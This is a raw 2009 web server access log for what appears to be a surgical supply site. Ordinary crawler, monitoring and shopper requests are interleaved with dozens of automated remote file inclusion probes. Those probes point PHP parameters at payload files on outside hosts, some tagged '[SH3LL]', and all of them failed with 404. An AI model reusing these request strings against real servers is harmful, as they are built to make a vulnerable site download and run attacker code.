217.125.38.117 - - [19/Jun/2009:02:19:22 -0400] "GET /logs/access_log.Q109052200%20%20//include/lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.125.38.117 - - [19/Jun/2009:02:19:22 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:02:19:47 -0400] "GET /logs/access_log.Q108101600 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.202.194.157 - - [19/Jun/2009:02:19:56 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GTR" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
209.59.12.99 - - [19/Jun/2009:02:20:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.230.22.39 - - [19/Jun/2009:02:20:30 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:02:20:30 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:02:20:30 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:02:20:34 -0400] "GET /images/Index6_surggown.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
87.230.22.39 - - [19/Jun/2009:02:20:40 -0400] "GET /logs/access_log.Q109060100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.172.33.230 - - [19/Jun/2009:02:21:02 -0400] "GET /logs/access_log.Q109051600/?_SERVER[DOCUMENT_ROOT]=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.172.33.230 - - [19/Jun/2009:02:21:07 -0400] "GET /logs/access_log.Q109060900/?_SERVER[DOCUMENT_ROOT]=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:02:21:22 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
87.230.22.39 - - [19/Jun/2009:02:21:22 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
87.230.22.39 - - [19/Jun/2009:02:21:22 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
87.230.22.39 - - [19/Jun/2009:02:21:32 -0400] "GET /logs/error_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
83.103.72.130 - - [19/Jun/2009:02:22:16 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:02:22:18 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:02:22:20 -0400] "GET /appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:02:22:37 -0400] "GET /logs/access_log.Q109050900%20%20/appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:02:22:37 -0400] "GET /logs/appserv/main.php?appserv_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
151.1.154.24 - - [19/Jun/2009:02:23:18 -0400] "GET //component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
151.1.154.24 - - [19/Jun/2009:02:23:18 -0400] "GET /logs/access_log.Q109051200//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
151.1.154.24 - - [19/Jun/2009:02:23:18 -0400] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.189.59.237 - - [19/Jun/2009:02:23:31 -0400] "GET /logs/access_log.Q109052900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
190.144.44.36 - - [19/Jun/2009:02:23:47 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:23:47 -0400] "GET /errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:23:47 -0400] "GET /logs/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
151.1.154.24 - - [19/Jun/2009:02:23:58 -0400] "GET /logs/access_log.Q109051800//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
217.125.38.117 - - [19/Jun/2009:02:24:46 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [19/Jun/2009:02:24:52 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
217.125.38.117 - - [19/Jun/2009:02:25:04 -0400] "GET /logs/access_log.Q109050900//include/lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:02:25:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [19/Jun/2009:02:26:13 -0400] "GET /logs/error_log.Q109060700%20%20/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.125.38.117 - - [19/Jun/2009:02:26:27 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
217.125.38.117 - - [19/Jun/2009:02:26:27 -0400] "GET /appserv/main.php?appserv_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.125.38.117 - - [19/Jun/2009:02:26:32 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
217.125.38.117 - - [19/Jun/2009:02:26:42 -0400] "GET /logs/access_log.Q109060100/appserv/main.php?appserv_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:27:05 -0400] "GET /logs/error_log.Q109060700%20%20/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
151.1.154.24 - - [19/Jun/2009:02:27:08 -0400] "GET /logs/access_log.Q109051100//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
151.1.154.24 - - [19/Jun/2009:02:27:13 -0400] "GET /logs/access_log.Q109050800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:02:29:00 -0400] "GET /images/over-index7_acesutures.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
74.6.17.151 - - [19/Jun/2009:02:29:27 -0400] "GET /logs/access_log.Q108031900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.0.146.100 - - [19/Jun/2009:02:29:33 -0400] "GET /logs/error_log.Q109051900%20%20//index.php?noSet=0&includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.42.192.214 - - [19/Jun/2009:02:29:41 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
77.42.192.214 - - [19/Jun/2009:02:29:41 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
77.42.192.214 - - [19/Jun/2009:02:30:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
77.42.192.214 - - [19/Jun/2009:02:30:04 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
190.144.44.36 - - [19/Jun/2009:02:30:24 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
83.98.209.71 - - [19/Jun/2009:02:31:05 -0400] "GET /errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:31:05 -0400] "GET /logs/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:31:05 -0400] "GET /logs/error_log.Q109060700/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:02:31:11 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:02:31:11 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:02:31:11 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:02:31:16 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:31:22 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:31:24 -0400] "GET /errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:31:24 -0400] "GET /logs/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:31:24 -0400] "GET /logs/error_log.Q109060700/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:02:31:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [19/Jun/2009:02:31:43 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:02:31:43 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:02:31:43 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:02:31:48 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:31:49 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
190.144.44.36 - - [19/Jun/2009:02:33:59 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:33:59 -0400] "GET /errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
190.144.44.36 - - [19/Jun/2009:02:33:59 -0400] "GET /logs/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
212.48.165.5 - - [19/Jun/2009:02:34:53 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]http://budhathokihandicraft.com/avactis-layouts/files/id.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.813"
212.48.165.5 - - [19/Jun/2009:02:34:53 -0400] "GET /logs/error_log.Q108052600//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]http://budhathokihandicraft.com/avactis-layouts/files/id.txt???? HTTP/1.1" 404 272 "-" "libwww-perl/5.813"
212.48.165.5 - - [19/Jun/2009:02:34:54 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]http://budhathokihandicraft.com/avactis-layouts/files/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.813"
212.48.165.5 - - [19/Jun/2009:02:34:55 -0400] "GET //path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]http://budhathokihandicraft.com/avactis-layouts/files/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.813"
212.48.165.5 - - [19/Jun/2009:02:34:55 -0400] "GET /logs/error_log.Q108052600//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]http://budhathokihandicraft.com/avactis-layouts/files/id.txt???? HTTP/1.1" 404 272 "-" "libwww-perl/5.813"
212.48.165.5 - - [19/Jun/2009:02:34:55 -0400] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]http://budhathokihandicraft.com/avactis-layouts/files/id.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.813"
212.48.165.5 - - [19/Jun/2009:02:35:00 -0400] "GET /logs/access_log.Q109050300//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]http://budhathokihandicraft.com/avactis-layouts/files/id.txt???? HTTP/1.1" 404 273 "-" "libwww-perl/5.813"
212.48.165.5 - - [19/Jun/2009:02:35:01 -0400] "GET /logs/access_log.Q109050300//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=[SH3LL]http://budhathokihandicraft.com/avactis-layouts/files/id.txt???? HTTP/1.1" 404 273 "-" "libwww-perl/5.813"
83.98.209.71 - - [19/Jun/2009:02:35:28 -0400] "GET /logs/access_log.Q109051500%20%20/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:35:33 -0400] "GET /logs/access_log.Q109051100%20%20/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:35:41 -0400] "GET /logs/access_log.Q109051500%20%20/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:02:35:47 -0400] "GET /logs/access_log.Q109051100%20%20/errors.php?error=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:02:35:53 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:02:35:53 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:02:35:53 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:02:35:54 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:02:35:54 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:02:35:54 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:02:37:25 -0400] "GET /images/150x150_sample.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
123.143.98.5 - - [19/Jun/2009:02:38:38 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:02:38:39 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:02:38:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.230.22.39 - - [19/Jun/2009:02:40:25 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:02:40:25 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:02:40:26 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
190.144.44.36 - - [19/Jun/2009:02:40:36 -0400] "GET /logs/access_log.Q109060100/errors.php?error=http://harasyeen.do.am/har.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
38.99.13.118 - - [19/Jun/2009:02:41:00 -0400] "GET /logs/error_log.Q108032900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.71.54 - - [19/Jun/2009:02:42:15 -0400] "GET /images/over-index11_osseo.jpg HTTP/1.1" 200 2504 "-" "Googlebot-Image/1.0"
125.18.8.178 - - [19/Jun/2009:02:42:39 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:42:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
87.230.22.39 - - [19/Jun/2009:02:42:42 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.18.8.178 - - [19/Jun/2009:02:43:37 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:44 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089 HTTP/1.1" 200 45268 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:45 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:45 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:45 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:45 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:45 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:46 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:46 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:46 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:46 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:46 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:46 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
125.18.8.178 - - [19/Jun/2009:02:43:46 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0800089" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
